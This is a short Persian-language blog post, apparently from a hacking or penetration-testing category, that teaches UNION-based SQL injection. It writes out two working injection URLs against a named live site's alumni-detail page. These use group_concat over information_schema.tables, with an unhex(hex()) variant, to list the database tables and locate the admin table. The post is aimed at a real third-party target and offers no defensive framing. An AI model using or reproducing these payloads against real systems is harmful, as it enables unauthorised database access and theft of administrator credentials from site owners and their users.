به نام خدا

خوب دوستان زماتی هست که شما به ضورت زیر دستورات را وارد می کنید برای بیرون کشیدن تیبل ادمین

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from
+information_schema.tables--+

در این حالت ممکن است تیبل ادمین برای شما به نمایش در نیاید که ابتدا به جای اینکه بروید سراغ استفاده از دستور دیگر ابتدا باید به صورت زیر عمل کنید


https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from
+information_schema.tables--+


در اینجا ما دستور را استفاده کردیم که در صورتی که تیبل ادمین برای ما به نمایش در تیامد ابتدا به این صورت عمل کرده

فوق و پیروز باشید





نوشته شده در تاریخ چهارشنبه 28 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()